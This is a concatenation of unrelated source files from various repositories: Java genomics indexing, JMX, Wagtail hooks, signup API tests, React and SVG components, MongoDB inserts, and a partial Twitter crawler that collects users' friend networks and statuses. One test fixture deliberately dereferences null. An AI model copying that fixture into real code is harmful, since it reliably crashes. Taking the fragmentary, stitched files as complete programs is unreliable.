  `priority` int(1) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
ALTER TABLE `task`
  ADD PRIMARY KEY (`id`);
ALTER TABLE `task`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1;
<gh_stars>1-10
package align2;
import java.util.ArrayList;
import stream.SiteScore;
/**
* @author <NAME>
* @date Oct 15, 2013
*
*/
public abstract class AbstractIndex {

    /**
     * Base constructor for k-mer index implementations.
     * @param keylen      key length in bases (KEYLEN); key space is 4^KEYLEN
     * @param kfilter     minimum number of contiguous matches a site must have
     * @param pointsMatch score contribution per matching base of a key hit
     * @param minChrom_   lowest chromosome number covered by this index
     * @param maxChrom_   highest chromosome number covered by this index
     * @param msa_        aligner used for scoring
     */
    AbstractIndex(int keylen, int kfilter, int pointsMatch, int minChrom_, int maxChrom_, MSA msa_){
        KEYLEN=keylen;
        // 2 bits per base, so the key space is 1 << (2*KEYLEN) == 4^KEYLEN.
        KEYSPACE=1<<(2*KEYLEN);
        BASE_KEY_HIT_SCORE=pointsMatch*KEYLEN;
        KFILTER=kfilter;
        msa=msa_;
        minChrom=minChrom_;
        maxChrom=maxChrom_;
        // Instance range must agree with the class-wide static range.
        assert(minChrom==MINCHROM);
        assert(maxChrom==MAXCHROM);
        assert(minChrom<=maxChrom);
    }

    /**
     * Returns the number of index hits for a key, counting both the key and
     * its reverse complement (unless they are identical). Uses the COUNTS
     * cache when present, otherwise consults block 0 of the index.
     */
    final int count(int key){
//      assert(false);
        if(COUNTS!=null){return COUNTS[key];} //TODO: Benchmark speed and memory usage with counts=null.  Probably only works for single-block genomes.
//      assert(false);
        final Block b=index[0];
        final int rkey=KeyRing.reverseComplementKey(key, KEYLEN);
        int a=b.length(key);
        // Avoid double-counting palindromic keys (key == its own revcomp).
        return key==rkey ? a : a+b.length(rkey);
    }

    /** True when the closed intervals (a1,b1) and (a2,b2) overlap. */
    static final boolean overlap(int a1, int b1, int a2, int b2){
        assert(a1<=b1 && a2<=b2) : a1+", "+b1+", "+a2+", "+b2;
        return a2<=b1 && b2>=a1;
    }

    /** Is (a1, b1) within (a2, b2) ? */
    static final boolean isWithin(int a1, int b1, int a2, int b2){
        assert(a1<=b1 && a2<=b2) : a1+", "+b1+", "+a2+", "+b2;
        return a1>=a2 && b1<=b2;
    }

    /** Generates a term that increases score with how far apart the two farthest perfect matches are.
     * Assumes that the centerIndex corresponds to the leftmost perfect match. */
    final int scoreY(int[] locs, int centerIndex, int offsets[]){
        int center=locs[centerIndex];
//      int rightIndex=centerIndex;
//      for(int i=centerIndex; i<offsets.length; i++){
//          if(locs[i]==center){
//              rightIndex=i;
//          }
//      }
        // Scan from the right end toward centerIndex for the rightmost key
        // sharing the same location; terminates because locs[centerIndex]
        // itself equals center.
        int rightIndex=-1;
        for(int i=offsets.length-1; rightIndex<centerIndex; i--){
            if(locs[i]==center){
                rightIndex=i;
            }
        }
        //Assumed to not be necessary.
//      for(int i=0; i<centerIndex; i++){
//          if(locs[i]==center){
//              centerIndex=i;
//          }
//      }
        return offsets[rightIndex]-offsets[centerIndex];
    }

    // --- Abstract hooks implemented by concrete index types. ---
    abstract float[] keyProbArray();
    abstract byte[] getBaseScoreArray(int len, int strand);
    abstract int[] getKeyScoreArray(int len, int strand);
    abstract int maxScore(int[] offsets, byte[] baseScores, int[] keyScores, int readlen, boolean useQuality);
    public abstract ArrayList<SiteScore> findAdvanced(byte[] basesP, byte[] basesM, byte[] qual, byte[] baseScoresP, int[] keyScoresP, int[] offsets, long id);

    // --- Per-instance statistics counters. ---
    long callsToScore=0;
    long callsToExtendScore=0;
    long initialKeys=0;
    long initialKeyIterations=0;
    long initialKeys2=0;
    long initialKeyIterations2=0;
    long usedKeys=0;
    long usedKeyIterations=0;

    // Histograms of hit counts (capped at HIT_HIST_LEN buckets).
    static final int HIT_HIST_LEN=40;
    final long[] hist_hits=new long[HIT_HIST_LEN+1];
    final long[] hist_hits_score=new long[HIT_HIST_LEN+1];
    final long[] hist_hits_extend=new long[HIT_HIST_LEN+1];

    // Chromosome range this instance covers.
    final int minChrom;
    final int maxChrom;
    static int MINCHROM=1;
    static int MAXCHROM=Integer.MAX_VALUE;

    static final boolean SUBSUME_SAME_START_SITES=true; //Not recommended if slow alignment is disabled.
    static final boolean SUBSUME_SAME_STOP_SITES=true; //Not recommended if slow alignment is disabled.
    /**
     * True: Slightly slower.<br>
     * False: Faster, but may mask detection of some ambiguously mapping reads.
     */
    static final boolean LIMIT_SUBSUMPTION_LENGTH_TO_2X=true;
    /** Not recommended if slow alignment is disabled.  Can conceal sites that should be marked as amiguous. */
    static final boolean SUBSUME_OVERLAPPING_SITES=false;
    static final boolean SHRINK_BEFORE_WALK=true;

    /** More accurate but uses chromosome arrays while mapping */
    static final boolean USE_EXTENDED_SCORE=true; //Calculate score more slowly by extending keys
    /** Even more accurate but even slower than normal extended score calculation.
     * Scores are compatible with slow-aligned scores. */
    static final boolean USE_AFFINE_SCORE=true && USE_EXTENDED_SCORE; //Calculate score even more slowly

    public static final boolean RETAIN_BEST_SCORES=true;
    public static final boolean RETAIN_BEST_QCUTOFF=true;
    public static boolean QUIT_AFTER_TWO_PERFECTS=true;
    static final boolean DYNAMICALLY_TRIM_LOW_SCORES=true;
    static final boolean REMOVE_CLUMPY=true; //Remove keys like AAAAAA or GCGCGC that self-overlap and thus occur in clumps

    /** If no hits are found, search again with slower parameters (less of genome excluded) */
    static final boolean DOUBLE_SEARCH_NO_HIT=false;
    /** Only this fraction of the originally removed genome fraction (FRACTION_GENOME_TO_EXCLUDE)
     * is removed for the second pass */
    static final float DOUBLE_SEARCH_THRESH_MULT=0.25f; //Must be less than 1.

    static boolean PERFECTMODE=false;
    static boolean SEMIPERFECTMODE=false;
    static boolean REMOVE_FREQUENT_GENOME_FRACTION=true;//Default true; false is more accurate
    static boolean TRIM_BY_GREEDY=true;//default: true
    /** Ignore longest site list(s) when doing a slow walk. */
    static final boolean TRIM_LONG_HIT_LISTS=false; //Increases speed with tiny loss of accuracy.  Default: true for clean or synthetic, false for noisy real data
    public static int MIN_APPROX_HITS_TO_KEEP=1; //Default 2 for skimmer, 1 otherwise, min 1; lower is more accurate
    public static final boolean TRIM_BY_TOTAL_SITE_COUNT=false; //default: false
    /** Length histogram index of maximum average hit list length to use.
     * The max number of sites to search is calculated by (#keys)*(lengthHistogram[chrom][MAX_AVERAGE_SITES_TO_SEARCH]).
     * Then, while the actual number of sites exceeds this, the longest hit list should be removed.
     */
    static int MAX_USABLE_LENGTH=Integer.MAX_VALUE;
    static int MAX_USABLE_LENGTH2=Integer.MAX_VALUE;

    /** Releases the static index structures so they can be garbage-collected. */
    public static void clear(){
        index=null;
        lengthHistogram=null;
        COUNTS=null;
    }

    // Shared (static) index data, populated elsewhere.
    static Block[] index;
    static int[] lengthHistogram=null;
    static int[] COUNTS=null;

    final int KEYLEN; //default 12, suggested 10 ~ 13, max 15; bigger is faster but uses more RAM
    final int KEYSPACE;
    /** Site must have at least this many contiguous matches */
    final int KFILTER;
    final MSA msa;
    final int BASE_KEY_HIT_SCORE;

    boolean verbose=false;
    static boolean verbose2=false;
    static boolean SLOW=false;
    static boolean VSLOW=false;

    static int NUM_CHROM_BITS=3;
    static int CHROMS_PER_BLOCK=(1<<(NUM_CHROM_BITS));
    static final int MINGAP=Shared.MINGAP;
    static final int MINGAP2=(MINGAP+128); //Depends on read length...
    static boolean USE_CAMELWALK=false;

    static final boolean ADD_LIST_SIZE_BONUS=false;
    static final byte[] LIST_SIZE_BONUS=new byte[100];

    /** Bonus for short hit lists (array overload); 0 when the list is large or null. */
    static final int calcListSizeBonus(int[] array){
        if(array==null || array.length>LIST_SIZE_BONUS.length-1){return 0;}
        return LIST_SIZE_BONUS[array.length];
    }

    /** Bonus for short hit lists (size overload); 0 when the size is out of range. */
    static final int calcListSizeBonus(int size){
        if(size>LIST_SIZE_BONUS.length-1){return 0;}
        return LIST_SIZE_BONUS[size];
    }

    // Populate the list-size bonus table: small lists get a small bonus.
    static{
        final int len=LIST_SIZE_BONUS.length;
//      for(int i=1; i<len; i++){
//          int x=(int)((len/(Math.sqrt(i)))/5)-1;
//          LIST_SIZE_BONUS[i]=(byte)(x/2);
//      }
        LIST_SIZE_BONUS[0]=3;
        LIST_SIZE_BONUS[1]=2;
        LIST_SIZE_BONUS[2]=1;
        LIST_SIZE_BONUS[len-1]=0;
//      System.err.println(Arrays.toString(LIST_SIZE_BONUS));
    }
}
|
<filename>chest/3rd-party/rrd4j/common/src/main/java/net/community/chest/rrd4j/common/jmx/MBeanDsDef.java
package net.community.chest.rrd4j.common.jmx;
import net.community.chest.jmx.dom.MBeanFeatureDescriptor;
import net.community.chest.rrd4j.common.core.DsDefExt;
import net.community.chest.util.datetime.TimeUnits;
import org.rrd4j.DsType;
import org.w3c.dom.Element;
/**
* <P>Copyright 2008 as per GPLv2</P>
*
* @author <NAME>.
* @since Jan 10, 2008 3:23:36 PM
*/
public class MBeanDsDef extends DsDefExt {
    // Name of the JMX MBean attribute sampled by this data source.
    private String _attrName /* =null */;

    public MBeanDsDef (String dsName, DsType dsType, long heartbeat, double minValue, double maxValue) {
        super(dsName, dsType, heartbeat, minValue, maxValue);
    }

    public MBeanDsDef (String dsName, DsType dsType, TimeUnits htUnits, long htValue, double minValue, double maxValue) {
        super(dsName, dsType, htUnits, htValue, minValue, maxValue);
    }

    public MBeanDsDef (String dsName, DsType dsType, long heartbeat) {
        super(dsName, dsType, heartbeat);
    }

    public MBeanDsDef (String dsName, DsType dsType, TimeUnits htUnits, long htValue) {
        super(dsName, dsType, htUnits, htValue);
    }

    /** Builds the definition from its XML element, including the attribute name. */
    public MBeanDsDef (Element elem) throws Exception {
        super(elem);
        setMBeanAttributeName(elem);
    }

    /** @return the sampled MBean attribute name (null until set) */
    public String getMBeanAttributeName () {
        return _attrName;
    }

    public void setMBeanAttributeName (String name) {
        _attrName = name;
    }

    /**
     * Reads the attribute name from the element and stores it when non-empty.
     * @return the raw attribute value read from the element (may be null/empty)
     */
    public String setMBeanAttributeName (Element elem) throws Exception {
        final String val = elem.getAttribute(MBeanFeatureDescriptor.NAME_ATTR);
        final boolean haveValue = (val != null) && (val.length() > 0);
        if (haveValue)
            setMBeanAttributeName(val);
        return val;
    }
}
|
<gh_stars>0
class P3
{
    public static void main(String[] args)
    {
        // Walk from 20 down to 10 inclusive, reporting every odd value.
        for (int i = 20; i >= 10; i--)
        {
            if (i % 2 != 0)
            {
                System.out.println(i + " is a odd number");
            }
        }
    }
}
|
import wagtail.admin.rich_text.editors.draftail.features as draftail_features
from django.conf import settings
from django.utils.html import format_html_join
from wagtail.core import hooks
from .rich_text import (
AnchorEntityElementHandler, AnchorIndentifierEntityElementHandler,
anchor_entity_decorator, anchor_identifier_entity_decorator
)
@hooks.register('register_rich_text_features')
def register_rich_text_anchor_feature(features):
    """
    Registering the `anchor` feature, which uses the `ANCHOR` Draft.js entity
    type, and is stored as HTML with a `<a data-anchor href="#my-anchor">` tag.
    """
    features.default_features.append('anchor')

    feature_name = 'anchor'
    entity_type = 'ANCHOR'

    # Toolbar control shown in the Draftail editor.
    features.register_editor_plugin(
        'draftail',
        feature_name,
        draftail_features.EntityFeature({
            'type': entity_type,
            'label': '#',
            'description': 'Anchor Link',
        }),
    )

    # Map between the stored DB representation and the contentstate entity.
    # Note here that the conversion is more complicated than for blocks
    # and inline styles.
    features.register_converter_rule('contentstate', feature_name, {
        'from_database_format': {
            'a[data-anchor]': AnchorEntityElementHandler(entity_type)
        },
        'to_database_format': {
            'entity_decorators': {entity_type: anchor_entity_decorator}
        },
    })
@hooks.register('insert_editor_js')
def insert_editor_js_anchor():
    """Inject the Draftail anchor plugin scripts into the admin editor."""
    # draftail.js is listed first to make sure it is loaded before the plugin.
    script_paths = (
        'wagtailadmin/js/draftail.js',
        'kdl_wagtail_draftail/js/anchor.js',
    )
    return format_html_join(
        '\n', '<script src="{0}{1}"></script>',
        ((settings.STATIC_URL, path) for path in script_paths),
    )
@hooks.register('register_rich_text_features')
def register_rich_text_anchor_identifier_feature(features):
    """
    Registering the `anchor-identifier` feature, which uses the
    `ANCHOR-IDENTIFIER` Draft.js entity type, and is stored as HTML with a
    `<a data-anchor href="#my-anchor" id="my-anchor">` tag.
    """
    features.default_features.append('anchor-identifier')

    feature_name = 'anchor-identifier'
    entity_type = 'ANCHOR-IDENTIFIER'

    # Toolbar control shown in the Draftail editor.
    features.register_editor_plugin(
        'draftail',
        feature_name,
        draftail_features.EntityFeature({
            'type': entity_type,
            'label': '<#id>',
            'description': 'Anchor Identifier',
        }),
    )

    # Map between the stored DB representation and the contentstate entity.
    # Note here that the conversion is more complicated than for blocks
    # and inline styles.
    features.register_converter_rule('contentstate', feature_name, {
        'from_database_format': {
            'a[data-id]': AnchorIndentifierEntityElementHandler(entity_type)
        },
        'to_database_format': {
            'entity_decorators': {entity_type: anchor_identifier_entity_decorator}
        },
    })
|
<gh_stars>1-10
package com.illumina.basespace.property;
import java.util.ArrayList;
import java.util.List;
import com.illumina.basespace.entity.ApiResource;
import com.illumina.basespace.util.TypeHelper;
/**
 * A property whose value references one API resource (content) or a
 * collection of resources (items), and can render the REST path(s) of
 * whatever it references.
 */
public abstract class ReferenceProperty<T extends ApiResource> extends Property<T>
{
    public ReferenceProperty(String name,String description)
    {
        super(name,description);
    }

    public ReferenceProperty()
    {
        super();
    }

    public ReferenceProperty(String name, String description, T content)
    {
        super(name, description, content);
    }

    public ReferenceProperty(String name, String description, T[] items)
    {
        super(name, description, items);
    }

    /**
     * @return one REST path per referenced resource: a single path when a
     * single content object is set, otherwise one path for each item.
     */
    public String[]getItemPaths()
    {
        final List<String> paths = new ArrayList<String>();
        final T single = getContent();
        if (single != null)
        {
            paths.add(TypeHelper.INSTANCE.getResourcePath(single.getClass(), true) + "/" + single.getId());
        }
        else
        {
            for (final T item : getItems())
            {
                paths.add(TypeHelper.INSTANCE.getResourcePath(item.getClass(), true) + "/" + item.getId());
            }
        }
        return paths.toArray(new String[paths.size()]);
    }
}
|
const supertest = require("supertest");
const app = require("../../../../server");
const database = require("../../../../server/database");
const cleanDatabase = require("../../../utils/cleanDatabase");
// Reset the database once the whole suite has run.
afterAll(() => cleanDatabase());

// NOTE(review): these cases are order-dependent — the "allowSignup: false"
// test mutates the settings table, and nothing restores it before the
// "different casing" test below; confirm that test still sees USER_EXISTS
// (409) rather than SIGNUP_NOT_ALLOWED (400).
describe("POST /api/v1/auth/signup", () => {
  // Missing body entirely -> email validation fails first.
  it('should throw error "EMAIL_INVALID"', async () => {
    const response = await supertest(app).post("/api/v1/auth/signup");
    expect(response.headers["content-type"]).toContain("application/json");
    expect(response.status).toBe(400);
    expect(response.body.code).toBe("EMAIL_INVALID");
  });
  // Email present but no password.
  it('should throw error "PASSWORD_MISSING"', async () => {
    const response = await supertest(app).post("/api/v1/auth/signup").send({
      email: "<EMAIL>",
    });
    expect(response.headers["content-type"]).toContain("application/json");
    expect(response.status).toBe(400);
    expect(response.body.code).toBe("PASSWORD_MISSING");
  });
  // Happy path: valid email + password creates the account.
  it("should create new user", async () => {
    const response = await supertest(app).post("/api/v1/auth/signup").send({
      email: "<EMAIL>",
      password: "password",
    });
    const user = response.body.user;
    expect(response.status).toBe(201);
    expect(user).toMatchObject({
      name: null,
      username: "user",
      email: "<EMAIL>",
    });
  });
  it("should not be allow to create account", async () => {
    // set allowSignup to false in settings table
    await database
      .update({
        allowSignup: false,
      })
      .from("settings");
    const response = await supertest(app).post("/api/v1/auth/signup").send({
      email: "<EMAIL>",
      password: "password",
    });
    expect(response.status).toBe(400);
    expect(response.body.code).toBe("SIGNUP_NOT_ALLOWED");
  });
  // Email uniqueness should be case-insensitive: second signup conflicts.
  it("should not create new user with different casing in email", async () => {
    await supertest(app).post("/api/v1/auth/signup").send({
      email: "<EMAIL>",
      password: "password"
    });
    const response = await supertest(app).post("/api/v1/auth/signup").send({
      email: "<EMAIL>",
      password: "password"
    });
    expect(response.headers["content-type"]).toContain("application/json");
    expect(response.status).toBe(409);
    expect(response.body.code).toBe("USER_EXISTS");
  })
});
|
import React from "react";
import { Box, Code, Divider, Heading, Text } from "@chakra-ui/react";
const Comments = ({ comments = [] }) => {
return (
<>
<Heading size="md">Comments</Heading>
<div className="flex-row my-4">
{comments &&
comments.map((comment) => (
<div key={comment._id}>
<Box
borderWidth="1px"
borderRadius="lg"
overflow="hidden"
mt={3}
mb={2}
>
<Heading size="md">
{comment.commentAuthor} commented{" "}
<span style={{ fontSize: "0.825rem" }}>
on {comment.createdAt}
</span>
</Heading>
<Divider />
<Code mt={3}>{comment.commentText}</Code>
</Box>
</div>
))}
</div>
</>
);
};
export default Comments;
|
import React from 'react';
export default class ArrowDown extends React.Component {
render() {
const { width, height, color } = this.props;
return (
<svg width={width} height={height} viewBox="0 0 140 140" version="1.1" >
<g id="Icons" stroke="none" strokeWidth="1" fill="none" fillRule="evenodd">
<g transform="translate(-5144.000000, -591.000000)" fillRule="nonzero" id="icon_new_Inquiry">
<g transform="translate(5152.000000, 591.000000)">
<g id="Group" transform="translate(4.225455, 4.263636)" fill="url(#linearGradient-1)">
<rect id="矩形_562-2" x="0" y="0" width="111.927879" height="127.917576" rx="4"></rect>
</g>
<path d="M69.627072,113.744148 L69.627072,102.115663 C60.1951978,100.19039 53.7532786,91.4359298 54.7208147,81.85831 C55.6883508,72.2806902 63.7510088,64.9914902 73.377375,64.9914902 C83.0037413,64.9914902 91.0663993,72.2806902 92.0339354,81.85831 C93.0014715,91.4359298 86.5595523,100.19039 77.1276781,102.115663 L77.1276781,113.744148 C77.127678,115.815383 75.4486102,117.494451 73.377375,117.494451 C71.3061399,117.494451 69.6270721,115.815383 69.627072,113.744148 Z M62.126466,83.7417235 C62.126466,89.955429 67.1636695,94.9926326 73.377375,94.9926326 C79.5910806,94.9926326 84.6282841,89.955429 84.6282841,83.7417235 C84.6282841,77.528018 79.5910806,72.4908144 73.377375,72.4908144 C67.1665771,72.4978283 62.1334798,77.5309256 62.126466,83.7417235 Z" id="联合_2" fill="#FFFFFF" transform="translate(73.377375, 91.242970) rotate(-45.000000) translate(-73.377375, -91.242970) "></path>
</g>
</g>
</g>
</svg>
)
}
} |
// Create the `users` collection explicitly (MongoDB would also create it
// implicitly on the first insert).
db.createCollection('users')
// Seed two user documents.
db.users.insertOne({
  firstName: 'John',
  lastName: 'Smith',
  age: 25,
  email: 'john.smith@example.com'
})
db.users.insertOne({
  firstName: 'Jane',
  lastName: 'Doe',
  age: 23,
  email: 'jane.doe@example.com'
})
import java.util.concurrent.atomic.AtomicReferenceFieldUpdater;
public class NonAssignedFieldsTest {
    // Linked-list node whose volatile `next` field is managed through a
    // reflection-based atomic field updater.
    static class Node<T> {
        volatile Node<?> next;
        static final AtomicReferenceFieldUpdater<Node,Node> nextUpdater =
            AtomicReferenceFieldUpdater.newUpdater(Node.class, Node.class, "next");
    }
    {
        // Instance initializer: `node` is always null here, so `node.next`
        // throws NullPointerException on instantiation.
        // NOTE(review): the class name suggests this is a deliberate fixture
        // for a static-analysis/nullness test — confirm before "fixing".
        Node<?> node = null;
        Node<?> next = node.next;
    }
}
|
/*
* Author: <NAME> (melo.cassio at gmail.com)
*/
package crawler;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.PrintStream;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import twitter.TwitterRetry;
import twitter4j.IDs;
import twitter4j.Paging;
import twitter4j.ResponseList;
import twitter4j.Status;
import twitter4j.TwitterException;
import twitter4j.User;
import twitter4j.auth.AccessToken;
// TODO: preserve network distribution: normalize number of nodes
// TODO: check "rateLimitStatus" at each twitter request
// TODO: discard re-tweet option
/**
 * Crawls a Twitter neighborhood starting from a fixed set of focal users,
 * ranks the discovered users by in-network connectivity, then writes the
 * network (CSV) and recent statuses (text) to disk.
 */
public class MultifocalCrawler {
    /** Screen names whose neighborhoods seed the crawl. */
    public static final String[] FOCAL_NODES = {"manas", "sbisker", "jvaleski", "nicolecasanova"};
    /** Max friend links fetched per user. */
    public static final int NUMBER_Link2S = 30;
    /** Stop discovering new users once this many are known. */
    public static final int NUMBER_NODES = 600;
    /** Recent statuses fetched per kept user. */
    public static final int NUMBER_STATUSES = 20;

    public String networkOutputFile = "C:\\data\\twitter3.csv"; ///Users/cassiomelo/Dropbox/code/twittertest/data/twitter2.csv";
    public String contentOutputFile = "C:\\data\\twitter3.txt";//"/Users/cassiomelo/Dropbox/code/twittertest/data/twitter2.txt";

    TwitterRetry twitter;

    public MultifocalCrawler(){
        try {
            twitter = TwitterRetry.getInstance();
            AccessToken token = twitter.getOAuthAccessToken();
            System.out.println("Access Token " + token);
        } catch (Exception e) {
            e.printStackTrace();
            System.exit(1);
        }
    }

    /**
     * Fetches up to {@code max} friend IDs of a user, paging through the
     * cursored API (also capped at {@code max} pages, as in the original).
     */
    public HashSet<Long> getFriendsIDs(Long userId, int max) throws Exception {
        HashSet<Long> ret = new HashSet<Long>();
        long cursor = -1;
        IDs ids;
        int count = 0;
        do {
            ids = twitter.getFriendsIDs(userId, cursor);
            for (int i = 0; i < ids.getIDs().length && i < max; i++) {
                long id = ids.getIDs()[i];
                ret.add(id);
            }
            count++;
        } while ((cursor = ids.getNextCursor()) != 0 && count < max);
        return ret;
    }

    /** Fetches all friends of a user as full {@link User} objects. */
    public HashSet<User> getFriends(User u) throws Exception {
        HashSet<User> ret = new HashSet<User>();
        long cursor = -1;
        IDs ids;
        int count = 0;
        do {
            ids = twitter.getFriendsIDs(u.getScreenName(), cursor);
            for (int i = 0; i < ids.getIDs().length; i++) {
                long id = ids.getIDs()[i];
                ret.add(twitter.showUser(id));
            }
            count++;
        } while ((cursor = ids.getNextCursor()) != 0);
        return ret;
    }

    /**
     * Sorts users by rank and returns at most {@code max} of them.
     * FIX: {@code List.subList} returns a view, not an ArrayList, so the
     * original cast threw ClassCastException at runtime; the slice is now
     * copied into a fresh ArrayList. Also uses {@code max} as the exclusive
     * upper bound (the old {@code max-1} dropped one element).
     * NOTE(review): the comparator sorts ascending by rank, so the head of
     * the list holds the LEAST connected users — confirm the intended order.
     */
    public ArrayList<Long> getMostConnected(ArrayList<Long> users, int max) {
        // Sort by userRank
        Collections.sort(users, new Comparator<Long>() {
            @Override
            public int compare(Long o1, Long o2) {
                return (getRankForUser(o1, userRank)).compareTo(getRankForUser(o2, userRank));
            }
        });
        if (max <= users.size())
            return new ArrayList<Long>(users.subList(0, max));
        else return users;
    }

    /**
     * Sorts users by rank and truncates once three users with rank &lt;= 1
     * have been seen (avoids a node connected to too many peripheral nodes).
     * FIX: same subList-view/cast fix as above.
     */
    public ArrayList<Long> getMostConnected(ArrayList<Long> users) {
        // Sort by userRank
        Collections.sort(users, new Comparator<Long>() {
            @Override
            public int compare(Long o1, Long o2) {
                return (getRankForUser(o1, userRank)).compareTo(getRankForUser(o2, userRank));
            }
        });
        int count = 0;
        for (int i = 0; i < users.size(); i++) {
            Long userId = users.get(i);
            if (getRankForUser(userId, userRank) <= 1) {
                count++;
            }
            if (count >= 3) {// got 3 nodes with 1 connection, stop // this avoids a node connected with too many peripherical nodes
                return new ArrayList<Long>(users.subList(0, i));
            }
        }
        return users;
    }

    /**
     * Looks up a user's connection count in the rank table; 0 if absent.
     * FIX: boxed Longs are compared with equals() — the original {@code ==}
     * compared references and only worked inside the Long cache range.
     */
    public Integer getRankForUser(Long userId, ArrayList<Object[]> userRank){
        for (Object[] userCount : userRank) {
            if (userId.equals(userCount[0])) return (Integer) userCount[1];
        }
        return 0;
    }

    /** (userId, connectionCount) pairs, sorted ascending by count. */
    ArrayList<Object[]> userRank;

    /** Runs the whole pipeline: crawl network, rank, filter, persist. */
    public void crawl() throws TwitterException, IOException{
        String[] startnodes = FOCAL_NODES;
        ArrayList<Long> usersIds = new ArrayList<Long>();
        HashMap<Long,HashSet<Long>> network = new HashMap<Long,HashSet<Long>>();
        ArrayList<User> ret = new ArrayList<User>();
        HashMap<User,HashSet<Link2>> Link2s = new HashMap<User,HashSet<Link2>>();
        HashMap<User,ResponseList<Status>> statuses = new HashMap<User,ResponseList<Status>>();

        ResponseList<User> users = twitter.lookupUsers(startnodes);
        for (User u : users) {
            usersIds.add(u.getId());
        }

        /*
         * CRAWL NETWORK
         */
        int userIdx = 0;
        while (usersIds.size() < NUMBER_NODES) {
            Long curUserId = (Long) usersIds.get(userIdx);
            try {
                // save Link2s
                HashSet<Long> friendsIds = this.getFriendsIDs(curUserId, NUMBER_Link2S); // this might throw an "unauthorized" exception that's why it should come first
                network.put(curUserId, friendsIds);
                usersIds.addAll(friendsIds);
            } catch (Exception e) {
                System.err.println(e.getMessage());
                System.out.println("Error - not authorized for: "+curUserId + " - skipping...");
            }
            userIdx++;
        }

        // gather friends for the remaining users discovered above
        for (int i = userIdx; i < usersIds.size(); i++) {
            Long curUserId = (Long) usersIds.get(i);
            try {
                // save Link2s
                HashSet<Long> friendsIds = this.getFriendsIDs(curUserId, NUMBER_Link2S); // this might throw an "unauthorized" exception that's why it should come first
                network.put(curUserId, friendsIds);
            } catch (Exception e) {
                System.err.println(e.getMessage());
                System.out.println("Error - not authorized for: "+curUserId + " - skipping...");
            }
        }

        /*
         * RANK USERS WITH THEIR NUMBER OF CONNECTIONS
         */
        userRank = new ArrayList<Object[]>();
        for(Long userId : network.keySet() ) {
            int count = 0;
            for(Long otherUserId : network.keySet() ) {
                if (network.get(otherUserId).contains(userId)) // for each friendship with existing user, count++
                    count++;
            }
            Object[] usr = {userId, count};
            userRank.add(usr);
        }
        // Sort userRank ascending by connection count
        Collections.sort(userRank, new Comparator<Object[]>() {
            @Override
            public int compare(Object[] arg0, Object[] arg1) {
                return ((Integer) arg0[1]).compareTo((Integer)arg1[1]);
            }
        });

        /*
         * FILTER USERS
         */
        for (Object[] userCount : userRank) {
            Long curUserId = (Long) userCount[0];
            User curUser = null;
            try {
                curUser = twitter.showUser(curUserId);
                Link2s.put(curUser, new HashSet<Link2>());
            } catch (Exception e) { // TODO remover user
                System.err.println("ERROR: CARAI "+e.getMessage());
                continue;
            }
            try {
                ArrayList<Long> userFriendsIds = new ArrayList<Long>(
                        network.get(curUserId));
                ResponseList<User> friends = twitter.lookupUsers(convertLongs(getMostConnected(userFriendsIds, 7)));
                Iterator<User> it2 = friends.iterator();
                while (it2.hasNext()) {
                    User friend = (User) it2.next();
                    Link2 l = new Link2(curUser, friend);
                    Link2s.get(curUser).add(l);
                    users.add(friend);
                }
                // successfully fetched user info, save user
                ret.add(curUser);
                // save statuses
                Paging paging = new Paging(1, NUMBER_STATUSES);
                ResponseList<Status> userStatuses = twitter.getUserTimeline(
                        curUser.getId(), paging);
                statuses.put(curUser, userStatuses);
                System.out.println("Done with: @" + curUser.getScreenName());
            } catch (Exception e) {
                //System.err.println(e.getMessage());
                System.out.println("Error - not authorized for: "+curUser.getScreenName() + " - skipping...");
                // remove Link2s to people that had "unauthorized access" exception
                for (HashSet<Link2> Link2sPerUser : Link2s.values()) {
                    ArrayList<Link2> markedForRemoval = new ArrayList<Link2>();
                    for (Link2 curLink2 : Link2sPerUser) {
                        if (curLink2.from.getId() == curUser.getId() || curLink2.to.getId() == curUser.getId()) {
                            markedForRemoval.add(curLink2);
                        }
                    }
                    for (Link2 toRemoveLink2 : markedForRemoval) {
                        Link2sPerUser.remove(toRemoveLink2);
                    }
                }
            }
        }
        saveToCSVFile(ret, Link2s);
        saveContentToFile(statuses);
    }

    /*
     * Saves the network in NET format (Pajek)
     * http://gephi.org/users/supported-graph-formats/pajek-net-format/
     */
    public void saveToNetFile(ArrayList<User> users, HashMap<User,HashSet<Link2>> Link2s, HashMap<User,ResponseList<Status>> statuses) throws IOException{
        FileOutputStream fout = new FileOutputStream(new File(networkOutputFile));
        PrintStream ps = new PrintStream(fout);
        String Link2sString = "*Edges\n";
        ps.println("*Vertices "+users.size());
        for (User user : users) {
            ps.println(user.getId() + " \""+ user.getScreenName()+"\"");
            if (Link2s.containsKey(user)) {
                for(Link2 Link2 : Link2s.get(user)) {
                    Link2sString += Link2.toString() + "\n";
                }
            }
        }
        ps.println(Link2sString);
        ps.close();
        fout.close();
    }

    /** Writes one CSV row per user: source screen name, then its targets. */
    public void saveToCSVFile(ArrayList<User> users, HashMap<User,HashSet<Link2>> Link2s) throws IOException{
        FileOutputStream fout = new FileOutputStream(new File(networkOutputFile));
        PrintStream ps = new PrintStream(fout);
        for (HashSet<Link2> Link2sPerUser : Link2s.values()) {
            if (Link2sPerUser.size() > 0) {
                ps.print(Link2sPerUser.iterator().next().from.getScreenName() + ";");
                for (Link2 curLink2 : Link2sPerUser) {
                    ps.print(curLink2.to.getScreenName() + ";");
                }
                ps.print("\n");
            }
        }
        ps.close();
        fout.close();
    }

    /** Writes each kept user's recent statuses, one status per line. */
    public void saveContentToFile(HashMap<User,ResponseList<Status>> statuses) throws IOException{
        FileOutputStream fout = new FileOutputStream(new File(contentOutputFile));
        PrintStream ps = new PrintStream(fout);
        for (ResponseList<Status> statusesPerUser : statuses.values()) {
            if (statusesPerUser.size() > 0) {
                ps.println(Constants.IDENTIFIER +statusesPerUser.iterator().next().getUser().getScreenName() + Constants.IDENTIFIER +statusesPerUser.size());
                for (Status curStatus : statusesPerUser) {
                    ps.println(Constants.IDENTIFIER +curStatus.getId()+ Constants.IDENTIFIER+ curStatus.isRetweet()+ Constants.IDENTIFIER+
                            curStatus.getCreatedAt().getTime()+ Constants.IDENTIFIER+
                            curStatus.getText().replace("\n", "") + ""); // very important: replace line breaks
                }
            }
        }
        ps.close();
        fout.close();
    }

